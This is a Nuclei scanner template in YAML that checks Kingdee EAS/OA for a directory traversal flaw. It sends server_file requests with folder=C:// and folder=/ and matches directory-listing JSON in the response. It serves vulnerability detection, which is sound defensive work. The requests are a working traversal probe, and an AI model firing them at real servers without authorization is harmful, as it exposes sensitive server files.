nuclei-templates/vulnerabilities/other/kingdee-eas-directory-trave...

36 lines
1.1 KiB
YAML

id: kingdee-eas-directory-traversal
info:
name: Kingdee EAS - Directory Traversal
author: ritikchaddha
severity: medium
description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
reference:
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
tags: kingdee,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
- '{"name":"root","path":"/root","folder":true}'
condition: or
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200